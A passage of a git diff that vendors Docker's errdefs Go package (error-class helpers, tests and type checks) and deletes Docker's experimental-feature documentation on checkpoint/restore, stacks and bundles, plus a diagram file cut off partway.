+// Package errdefs defines a set of error interfaces that packages should use for communicating classes of errors.
+// Errors that cross the package boundary should implement one (and only one) of these interfaces.
+//
+// Packages should not reference these interfaces directly, only implement them.
+// To check if a particular error implements one of these interfaces, there are helper
+// functions provided (e.g. `Is<SomeError>`) which can be used rather than asserting the interfaces directly.
+// If you must assert on these interfaces, be sure to check the causal chain (`err.Cause()`).
+package errdefs // import "github.com/docker/docker/errdefs"
diff --git a/vendor/github.com/docker/docker/errdefs/helpers.go b/vendor/github.com/docker/docker/errdefs/helpers.go
new file mode 100644
index 0000000000..6169c2bc62
--- /dev/null
+++ b/vendor/github.com/docker/docker/errdefs/helpers.go
@@ -0,0 +1,240 @@
+package errdefs // import "github.com/docker/docker/errdefs"
+
+import "context"
+
+type errNotFound struct{ error }
+
+func (errNotFound) NotFound() {}
+
+func (e errNotFound) Cause() error {
+	return e.error
+}
+
+// NotFound is a helper to create an error of the class with the same name from any error type
+func NotFound(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errNotFound{err}
+}
+
+type errInvalidParameter struct{ error }
+
+func (errInvalidParameter) InvalidParameter() {}
+
+func (e errInvalidParameter) Cause() error {
+	return e.error
+}
+
+// InvalidParameter is a helper to create an error of the class with the same name from any error type
+func InvalidParameter(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errInvalidParameter{err}
+}
+
+type errConflict struct{ error }
+
+func (errConflict) Conflict() {}
+
+func (e errConflict) Cause() error {
+	return e.error
+}
+
+// Conflict is a helper to create an error of the class with the same name from any error type
+func Conflict(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errConflict{err}
+}
+
+type errUnauthorized struct{ error }
+
+func (errUnauthorized) Unauthorized() {}
+
+func (e errUnauthorized) Cause() error {
+	return e.error
+}
+
+// Unauthorized is a helper to create an error of the class with the same name from any error type
+func Unauthorized(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errUnauthorized{err}
+}
+
+type errUnavailable struct{ error }
+
+func (errUnavailable) Unavailable() {}
+
+func (e errUnavailable) Cause() error {
+	return e.error
+}
+
+// Unavailable is a helper to create an error of the class with the same name from any error type
+func Unavailable(err error) error {
+	return errUnavailable{err}
+}
+
+type errForbidden struct{ error }
+
+func (errForbidden) Forbidden() {}
+
+func (e errForbidden) Cause() error {
+	return e.error
+}
+
+// Forbidden is a helper to create an error of the class with the same name from any error type
+func Forbidden(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errForbidden{err}
+}
+
+type errSystem struct{ error }
+
+func (errSystem) System() {}
+
+func (e errSystem) Cause() error {
+	return e.error
+}
+
+// System is a helper to create an error of the class with the same name from any error type
+func System(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errSystem{err}
+}
+
+type errNotModified struct{ error }
+
+func (errNotModified) NotModified() {}
+
+func (e errNotModified) Cause() error {
+	return e.error
+}
+
+// NotModified is a helper to create an error of the class with the same name from any error type
+func NotModified(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errNotModified{err}
+}
+
+type errAlreadyExists struct{ error }
+
+func (errAlreadyExists) AlreadyExists() {}
+
+func (e errAlreadyExists) Cause() error {
+	return e.error
+}
+
+// AlreadyExists is a helper to create an error of the class with the same name from any error type
+func AlreadyExists(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errAlreadyExists{err}
+}
+
+type errNotImplemented struct{ error }
+
+func (errNotImplemented) NotImplemented() {}
+
+func (e errNotImplemented) Cause() error {
+	return e.error
+}
+
+// NotImplemented is a helper to create an error of the class with the same name from any error type
+func NotImplemented(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errNotImplemented{err}
+}
+
+type errUnknown struct{ error }
+
+func (errUnknown) Unknown() {}
+
+func (e errUnknown) Cause() error {
+	return e.error
+}
+
+// Unknown is a helper to create an error of the class with the same name from any error type
+func Unknown(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errUnknown{err}
+}
+
+type errCancelled struct{ error }
+
+func (errCancelled) Cancelled() {}
+
+func (e errCancelled) Cause() error {
+	return e.error
+}
+
+// Cancelled is a helper to create an error of the class with the same name from any error type
+func Cancelled(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errCancelled{err}
+}
+
+type errDeadline struct{ error }
+
+func (errDeadline) DeadlineExceeded() {}
+
+func (e errDeadline) Cause() error {
+	return e.error
+}
+
+// Deadline is a helper to create an error of the class with the same name from any error type
+func Deadline(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errDeadline{err}
+}
+
+type errDataLoss struct{ error }
+
+func (errDataLoss) DataLoss() {}
+
+func (e errDataLoss) Cause() error {
+	return e.error
+}
+
+// DataLoss is a helper to create an error of the class with the same name from any error type
+func DataLoss(err error) error {
+	if err == nil {
+		return nil
+	}
+	return errDataLoss{err}
+}
+
+// FromContext returns the error class from the passed in context
+func FromContext(ctx context.Context) error {
+	e := ctx.Err()
+	if e == nil {
+		return nil
+	}
+
+	if e == context.Canceled {
+		return Cancelled(e)
+	}
+	if e == context.DeadlineExceeded {
+		return Deadline(e)
+	}
+	return Unknown(e)
+}
diff --git a/vendor/github.com/docker/docker/errdefs/helpers_test.go b/vendor/github.com/docker/docker/errdefs/helpers_test.go
new file mode 100644
index 0000000000..f1c88704ca
--- /dev/null
+++ b/vendor/github.com/docker/docker/errdefs/helpers_test.go
@@ -0,0 +1,194 @@
+package errdefs // import "github.com/docker/docker/errdefs"
+
+import (
+	"errors"
+	"testing"
+)
+
+var errTest = errors.New("this is a test")
+
+type causal interface {
+	Cause() error
+}
+
+func TestNotFound(t *testing.T) {
+	if IsNotFound(errTest) {
+		t.Fatalf("did not expect not found error, got %T", errTest)
+	}
+	e := NotFound(errTest)
+	if !IsNotFound(e) {
+		t.Fatalf("expected not found error, got: %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestConflict(t *testing.T) {
+	if IsConflict(errTest) {
+		t.Fatalf("did not expect conflcit error, got %T", errTest)
+	}
+	e := Conflict(errTest)
+	if !IsConflict(e) {
+		t.Fatalf("expected conflcit error, got: %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestForbidden(t *testing.T) {
+	if IsForbidden(errTest) {
+		t.Fatalf("did not expect forbidden error, got %T", errTest)
+	}
+	e := Forbidden(errTest)
+	if !IsForbidden(e) {
+		t.Fatalf("expected forbidden error, got: %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestInvalidParameter(t *testing.T) {
+	if IsInvalidParameter(errTest) {
+		t.Fatalf("did not expect invalid argument error, got %T", errTest)
+	}
+	e := InvalidParameter(errTest)
+	if !IsInvalidParameter(e) {
+		t.Fatalf("expected invalid argument error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestNotImplemented(t *testing.T) {
+	if IsNotImplemented(errTest) {
+		t.Fatalf("did not expect not implemented error, got %T", errTest)
+	}
+	e := NotImplemented(errTest)
+	if !IsNotImplemented(e) {
+		t.Fatalf("expected not implemented error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestNotModified(t *testing.T) {
+	if IsNotModified(errTest) {
+		t.Fatalf("did not expect not modified error, got %T", errTest)
+	}
+	e := NotModified(errTest)
+	if !IsNotModified(e) {
+		t.Fatalf("expected not modified error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestAlreadyExists(t *testing.T) {
+	if IsAlreadyExists(errTest) {
+		t.Fatalf("did not expect already exists error, got %T", errTest)
+	}
+	e := AlreadyExists(errTest)
+	if !IsAlreadyExists(e) {
+		t.Fatalf("expected already exists error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestUnauthorized(t *testing.T) {
+	if IsUnauthorized(errTest) {
+		t.Fatalf("did not expect unauthorized error, got %T", errTest)
+	}
+	e := Unauthorized(errTest)
+	if !IsUnauthorized(e) {
+		t.Fatalf("expected unauthorized error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestUnknown(t *testing.T) {
+	if IsUnknown(errTest) {
+		t.Fatalf("did not expect unknown error, got %T", errTest)
+	}
+	e := Unknown(errTest)
+	if !IsUnknown(e) {
+		t.Fatalf("expected unknown error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestCancelled(t *testing.T) {
+	if IsCancelled(errTest) {
+		t.Fatalf("did not expect cancelled error, got %T", errTest)
+	}
+	e := Cancelled(errTest)
+	if !IsCancelled(e) {
+		t.Fatalf("expected cancelled error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestDeadline(t *testing.T) {
+	if IsDeadline(errTest) {
+		t.Fatalf("did not expect deadline error, got %T", errTest)
+	}
+	e := Deadline(errTest)
+	if !IsDeadline(e) {
+		t.Fatalf("expected deadline error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestDataLoss(t *testing.T) {
+	if IsDataLoss(errTest) {
+		t.Fatalf("did not expect data loss error, got %T", errTest)
+	}
+	e := DataLoss(errTest)
+	if !IsDataLoss(e) {
+		t.Fatalf("expected data loss error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestUnavailable(t *testing.T) {
+	if IsUnavailable(errTest) {
+		t.Fatalf("did not expect unavaillable error, got %T", errTest)
+	}
+	e := Unavailable(errTest)
+	if !IsUnavailable(e) {
+		t.Fatalf("expected unavaillable error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
+
+func TestSystem(t *testing.T) {
+	if IsSystem(errTest) {
+		t.Fatalf("did not expect system error, got %T", errTest)
+	}
+	e := System(errTest)
+	if !IsSystem(e) {
+		t.Fatalf("expected system error, got %T", e)
+	}
+	if cause := e.(causal).Cause(); cause != errTest {
+		t.Fatalf("causual should be errTest, got: %v", cause)
+	}
+}
diff --git a/vendor/github.com/docker/docker/errdefs/is.go b/vendor/github.com/docker/docker/errdefs/is.go
new file mode 100644
index 0000000000..e0513331bb
--- /dev/null
+++ b/vendor/github.com/docker/docker/errdefs/is.go
@@ -0,0 +1,114 @@
+package errdefs // import "github.com/docker/docker/errdefs"
+
+type causer interface {
+	Cause() error
+}
+
+func getImplementer(err error) error {
+	switch e := err.(type) {
+	case
+		ErrNotFound,
+		ErrInvalidParameter,
+		ErrConflict,
+		ErrUnauthorized,
+		ErrUnavailable,
+		ErrForbidden,
+		ErrSystem,
+		ErrNotModified,
+		ErrAlreadyExists,
+		ErrNotImplemented,
+		ErrCancelled,
+		ErrDeadline,
+		ErrDataLoss,
+		ErrUnknown:
+		return err
+	case causer:
+		return getImplementer(e.Cause())
+	default:
+		return err
+	}
+}
+
+// IsNotFound returns if the passed in error is an ErrNotFound
+func IsNotFound(err error) bool {
+	_, ok := getImplementer(err).(ErrNotFound)
+	return ok
+}
+
+// IsInvalidParameter returns if the passed in error is an ErrInvalidParameter
+func IsInvalidParameter(err error) bool {
+	_, ok := getImplementer(err).(ErrInvalidParameter)
+	return ok
+}
+
+// IsConflict returns if the passed in error is an ErrConflict
+func IsConflict(err error) bool {
+	_, ok := getImplementer(err).(ErrConflict)
+	return ok
+}
+
+// IsUnauthorized returns if the passed in error is an ErrUnauthorized
+func IsUnauthorized(err error) bool {
+	_, ok := getImplementer(err).(ErrUnauthorized)
+	return ok
+}
+
+// IsUnavailable returns if the passed in error is an ErrUnavailable
+func IsUnavailable(err error) bool {
+	_, ok := getImplementer(err).(ErrUnavailable)
+	return ok
+}
+
+// IsForbidden returns if the passed in error is an ErrForbidden
+func IsForbidden(err error) bool {
+	_, ok := getImplementer(err).(ErrForbidden)
+	return ok
+}
+
+// IsSystem returns if the passed in error is an ErrSystem
+func IsSystem(err error) bool {
+	_, ok := getImplementer(err).(ErrSystem)
+	return ok
+}
+
+// IsNotModified returns if the passed in error is a NotModified error
+func IsNotModified(err error) bool {
+	_, ok := getImplementer(err).(ErrNotModified)
+	return ok
+}
+
+// IsAlreadyExists returns if the passed in error is a AlreadyExists error
+func IsAlreadyExists(err error) bool {
+	_, ok := getImplementer(err).(ErrAlreadyExists)
+	return ok
+}
+
+// IsNotImplemented returns if the passed in error is an ErrNotImplemented
+func IsNotImplemented(err error) bool {
+	_, ok := getImplementer(err).(ErrNotImplemented)
+	return ok
+}
+
+// IsUnknown returns if the passed in error is an ErrUnknown
+func IsUnknown(err error) bool {
+	_, ok := getImplementer(err).(ErrUnknown)
+	return ok
+}
+
+// IsCancelled returns if the passed in error is an ErrCancelled
+func IsCancelled(err error) bool {
+	_, ok := getImplementer(err).(ErrCancelled)
+	return ok
+}
+
+// IsDeadline returns if the passed in error is an ErrDeadline
+func IsDeadline(err error) bool {
+	_, ok := getImplementer(err).(ErrDeadline)
+	return ok
+}
+
+// IsDataLoss returns if the passed in error is an ErrDataLoss
+func IsDataLoss(err error) bool {
+	_, ok := getImplementer(err).(ErrDataLoss)
+	return ok
+}
diff --git a/vendor/github.com/docker/docker/experimental/README.md b/vendor/github.com/docker/docker/experimental/README.md
deleted file mode 100644
index b57a5d1294..0000000000
--- a/vendor/github.com/docker/docker/experimental/README.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# Docker Experimental Features
-
-This page contains a list of features in the Docker engine which are
-experimental. Experimental features are **not** ready for production. They are
-provided for test and evaluation in your sandbox environments.
-
-The information below describes each feature and the GitHub pull requests and
-issues associated with it. If necessary, links are provided to additional
-documentation on an issue.  As an active Docker user and community member,
-please feel free to provide any feedback on these features you wish.
-
-## Use Docker experimental
-
-Experimental features are now included in the standard Docker binaries as of
-version 1.13.0.
-For enabling experimental features, you need to start the Docker daemon with
-`--experimental` flag.
-You can also enable the daemon flag via `/etc/docker/daemon.json`. e.g.
-
-```json
-{
-    "experimental": true
-}
-```
-
-Then make sure the experimental flag is enabled:
-
-```bash
-$ docker version -f '{{.Server.Experimental}}'
-true
-```
-
-## Current experimental features
-
- * [External graphdriver plugins](../docs/extend/plugins_graphdriver.md)
- * [Ipvlan Network Drivers](vlan-networks.md)
- * [Docker Stacks and Distributed Application Bundles](docker-stacks-and-bundles.md)
- * [Checkpoint & Restore](checkpoint-restore.md)
-
-## How to comment on an experimental feature
-
-Each feature's documentation includes a list of proposal pull requests or PRs associated with the feature. If you want to comment on or suggest a change to a feature, please add it to the existing feature PR.
-
-Issues or problems with a feature? Inquire for help on the `#docker` IRC channel or on the [Docker Google group](https://groups.google.com/forum/#!forum/docker-user).
diff --git a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md
deleted file mode 100644
index 7e609b60ec..0000000000
--- a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# Docker Checkpoint & Restore
-
-Checkpoint & Restore is a new feature that allows you to freeze a running
-container by checkpointing it, which turns its state into a collection of files
-on disk. Later, the container can be restored from the point it was frozen.
-
-This is accomplished using a tool called [CRIU](http://criu.org), which is an
-external dependency of this feature. A good overview of the history of
-checkpoint and restore in Docker is available in this
-[Kubernetes blog post](http://blog.kubernetes.io/2015/07/how-did-quake-demo-from-dockercon-work.html).
-
-## Installing CRIU
-
-If you use a Debian system, you can add the CRIU PPA and install with apt-get
-[from the criu launchpad](https://launchpad.net/~criu/+archive/ubuntu/ppa).
-
-Alternatively, you can [build CRIU from source](http://criu.org/Installation).
-
-You need at least version 2.0 of CRIU to run checkpoint/restore in Docker.
-
-## Use cases for checkpoint & restore
-
-This feature is currently focused on single-host use cases for checkpoint and
-restore. Here are a few:
-
-- Restarting the host machine without stopping/starting containers
-- Speeding up the start time of slow start applications
-- "Rewinding" processes to an earlier point in time
-- "Forensic debugging" of running processes
-
-Another primary use case of checkpoint & restore outside of Docker is the live
-migration of a server from one machine to another. This is possible with the
-current implementation, but not currently a priority (and so the workflow is
-not optimized for the task).
-
-## Using checkpoint & restore
-
-A new top level command `docker checkpoint` is introduced, with three subcommands:
-- `create` (creates a new checkpoint)
-- `ls` (lists existing checkpoints)
-- `rm` (deletes an existing checkpoint)
-
-Additionally, a `--checkpoint` flag is added to the container start command.
-
-The options for checkpoint create:
-
-    Usage:  docker checkpoint create [OPTIONS] CONTAINER CHECKPOINT
-
-    Create a checkpoint from a running container
-
-      --leave-running=false    Leave the container running after checkpoint
-      --checkpoint-dir         Use a custom checkpoint storage directory
-
-And to restore a container:
-
-    Usage:  docker start --checkpoint CHECKPOINT_ID [OTHER OPTIONS] CONTAINER
-
-
-A simple example of using checkpoint & restore on a container:
-
-    $ docker run --security-opt=seccomp:unconfined --name cr -d busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done'
-    > abc0123
-
-    $ docker checkpoint create cr checkpoint1
-
-    # <later>
-    $ docker start --checkpoint checkpoint1 cr
-    > abc0123
-
-This process just logs an incrementing counter to stdout. If you `docker logs`
-in between running/checkpoint/restoring you should see that the counter
-increases while the process is running, stops while it's checkpointed, and
-resumes from the point it left off once you restore.
-
-## Current limitation
-
-seccomp is only supported by CRIU in very up to date kernels.
-
-External terminal (i.e. `docker run -t ..`) is not supported at the moment.
-If you try to create a checkpoint for a container with an external terminal, 
-it would fail:
-
-    $ docker checkpoint create cr checkpoint1
-    Error response from daemon: Cannot checkpoint container c1: rpc error: code = 2 desc = exit status 1: "criu failed: type NOTIFY errno 0\nlog file: /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log\n"
-    
-    $ cat /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log
-    Error (mount.c:740): mnt: 126:./dev/console doesn't have a proper root mount
-
diff --git a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md
deleted file mode 100644
index b777c3919c..0000000000
--- a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md
+++ /dev/null
@@ -1,202 +0,0 @@
-# Docker Stacks and Distributed Application Bundles
-
-## Overview
-
-Docker Stacks and Distributed Application Bundles are experimental features
-introduced in Docker 1.12 and Docker Compose 1.8, alongside the concept of
-swarm mode, and Nodes and Services in the Engine API.
-
-A Dockerfile can be built into an image, and containers can be created from
-that image. Similarly, a docker-compose.yml can be built into a **distributed
-application bundle**, and **stacks** can be created from that bundle. In that
-sense, the bundle is a multi-services distributable image format.
-
-As of Docker 1.12 and Compose 1.8, the features are experimental. Neither
-Docker Engine nor the Docker Registry support distribution of bundles.
-
-## Producing a bundle
-
-The easiest way to produce a bundle is to generate it using `docker-compose`
-from an existing `docker-compose.yml`. Of course, that's just *one* possible way
-to proceed, in the same way that `docker build` isn't the only way to produce a
-Docker image.
-
-From `docker-compose`:
-
-```bash
-$ docker-compose bundle
-WARNING: Unsupported key 'network_mode' in services.nsqd - ignoring
-WARNING: Unsupported key 'links' in services.nsqd - ignoring
-WARNING: Unsupported key 'volumes' in services.nsqd - ignoring
-[...]
-Wrote bundle to vossibility-stack.dab
-```
-
-## Creating a stack from a bundle
-
-A stack is created using the `docker deploy` command:
-
-```bash
-# docker deploy --help
-
-Usage:  docker deploy [OPTIONS] STACK
-
-Create and update a stack from a Distributed Application Bundle (DAB)
-
-Options:
-      --file   string        Path to a Distributed Application Bundle file (Default: STACK.dab)
-      --help                 Print usage
-      --with-registry-auth   Send registry authentication details to Swarm agents
-```
-
-Let's deploy the stack created before:
-
-```bash
-# docker deploy vossibility-stack
-Loading bundle from vossibility-stack.dab
-Creating service vossibility-stack_elasticsearch
-Creating service vossibility-stack_kibana
-Creating service vossibility-stack_logstash
-Creating service vossibility-stack_lookupd
-Creating service vossibility-stack_nsqd
-Creating service vossibility-stack_vossibility-collector
-```
-
-We can verify that services were correctly created:
-
-```bash
-$ docker service ls
-ID            NAME                                     MODE         REPLICAS    IMAGE
-29bv0vnlm903  vossibility-stack_lookupd                replicated   1/1         nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4awt47624qwh  vossibility-stack_nsqd                   replicated   1/1         nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4tjx9biia6fs  vossibility-stack_elasticsearch          replicated   1/1         elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
-7563uuzr9eys  vossibility-stack_kibana                 replicated   1/1         kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
-9gc5m4met4he  vossibility-stack_logstash               replicated   1/1         logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
-axqh55ipl40h  vossibility-stack_vossibility-collector  replicated   1/1         icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
-```
-
-## Managing stacks
-
-Stacks are managed using the `docker stack` command:
-
-```bash
-# docker stack --help
-
-Usage:  docker stack COMMAND
-
-Manage Docker stacks
-
-Options:
-      --help   Print usage
-
-Commands:
-  config      Print the stack configuration
-  deploy      Create and update a stack
-  ls          List stacks
-  rm          Remove the stack
-  services    List the services in the stack
-  tasks       List the tasks in the stack
-
-Run 'docker stack COMMAND --help' for more information on a command.
-```
-
-## Bundle file format
-
-Distributed application bundles are described in a JSON format. When bundles
-are persisted as files, the file extension is `.dab` (Docker 1.12RC2 tools use
-`.dsb` for the file extension—this will be updated in the next release client).
-
-A bundle has two top-level fields: `version` and `services`. The version used
-by Docker 1.12 tools is `0.1`.
-
-`services` in the bundle are the services that comprise the app. They
-correspond to the new `Service` object introduced in the 1.12 Docker Engine API.
-
-A service has the following fields:
-
-<dl>
-    <dt>
-        Image (required) <code>string</code>
-    </dt>
-    <dd>
-        The image that the service will run. Docker images should be referenced
-        with full content hash to fully specify the deployment artifact for the
-        service. Example:
-        <code>postgres@sha256:f76245b04ddbcebab5bb6c28e76947f49222c99fec4aadb0bb
-        1c24821a 9e83ef</code>
-    </dd>
-    <dt>
-        Command <code>[]string</code>
-    </dt>
-    <dd>
-        Command to run in service containers.
-    </dd>
-    <dt>
-        Args <code>[]string</code>
-    </dt>
-    <dd>
-        Arguments passed to the service containers.
-    </dd>
-    <dt>
-        Env <code>[]string</code>
-    </dt>
-    <dd>
-        Environment variables.
-    </dd>
-    <dt>
-        Labels <code>map[string]string</code>
-    </dt>
-    <dd>
-        Labels used for setting meta data on services.
-    </dd>
-    <dt>
-        Ports <code>[]Port</code>
-    </dt>
-    <dd>
-        Service ports (composed of <code>Port</code> (<code>int</code>) and
-        <code>Protocol</code> (<code>string</code>). A service description can
-        only specify the container port to be exposed. These ports can be
-        mapped on runtime hosts at the operator's discretion.
-    </dd>
-
-    <dt>
-        WorkingDir <code>string</code>
-    </dt>
-    <dd>
-        Working directory inside the service containers.
-    </dd>
-
-    <dt>
-        User <code>string</code>
-    </dt>
-    <dd>
-        Username or UID (format: <code>&lt;name|uid&gt;[:&lt;group|gid&gt;]</code>).
-    </dd>
-
-    <dt>
-        Networks <code>[]string</code>
-    </dt>
-    <dd>
-        Networks that the service containers should be connected to. An entity
-        deploying a bundle should create networks as needed.
-    </dd>
-</dl>
-
-The following is an example of bundlefile with two services:
-
-```json
-{
-	"Version": "0.1",
-	"Services": {
-		"redis": {
-			"Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce",
-			"Networks": ["default"]
-		},
-		"web": {
-			"Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d",
-			"Networks": ["default"],
-			"User": "web"
-		}
-	}
-}
-```
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy
deleted file mode 100644
index bf0512af76..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy
+++ /dev/null
@@ -1 +0,0 @@
-{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":447,"height":422,"nodeIndex":326,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":9,"y":10.461511948529278},"max":{"x":447,"y":421.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":12.0,"y":200.0,"rotation":0.0,"id":276,"width":434.00000000000006,"height":197.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":275.0,"y":8.93295288085936,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":14,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[82.0,295.5670471191406],[-4.628896294384617,211.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":285.0,"y":18.93295288085936,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":15,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":316,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-204.0,285.5670471191406],[-100.37110370561533,201.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":203.5,"rotation":0.0,"id":267,"width":116.0,"height":16.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":16,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-family:Arial;\">Docker 